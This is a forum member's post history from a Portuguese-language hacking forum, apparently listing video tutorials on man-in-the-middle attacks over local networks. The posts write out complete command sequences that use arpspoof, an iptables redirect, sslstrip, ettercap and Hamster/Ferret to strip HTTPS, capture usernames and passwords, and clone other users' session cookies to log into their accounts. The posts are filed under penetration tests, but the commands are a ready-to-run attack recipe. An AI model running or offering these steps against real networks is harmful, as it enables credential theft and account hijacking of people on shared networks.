Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - Bhiór

Pages1
#1
Penetration Tests / Re:[Video aula]Sniffer SSL - https
04 de February , 2011, 11:02:40 PM
Se tira o excesso de http rsrs, alguma configuração do forum.
#2
Penetration Tests / [Video aula]Clonagem de cookies - Side-jacking
23 de April , 2010, 06:37:54 PM
Nessa vídeo aula mostro como usar alguns programas para fazer um clonagem de cookies ( Seção Sidejacking ) em uma rede local, Ex: entra em um determinado domínio(sites, forums, caixa e-mail e etc), com os cookies alheios. rsrs...

Foram usando na vídeo:
arpspoof
sslstrip
Hamster (e Ferret)

Programas:

arpspoof(DSniff) Versão: 2.3

sslstrip Versão: 0.6

Hamster Sidejacking Tool Versão: 2.0


Comandos:
Quoteecho 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.100 10.1.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f

/pentest/sniffers/hamster/ferret -i eth0

/pentest/sniffers/hamster/hamster

Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster

Previas:
Quotehttp://img685.imageshack.us/img685/9859/sidejaking.png
http://img88.imageshack.us/img88/4425/sidejaking1.png

Download:
Quotehttp://www.4shared.com/file/fVOJq_zW/Sidejacking.html
Assista on-line:
Quotehttp://blip.tv/file/3519001
#3
Penetration Tests / [Video aula]Sniffer SSL - https
23 de April , 2010, 06:35:19 PM
    Nesta video vou mostrar como a
criptografia SSL não e seguro. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafico da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).

rogramas usados:
[LIST=1]

Comando usados:
Quotekate /etc/etter.conf
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.6 10.1.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i eth0

OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0"

Todas os programas são encontrados no backtrack 4

Download da video:
Quotehttp://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html
Assista on-line:
Quotehttp://blip.tv/file/3525086
Pages1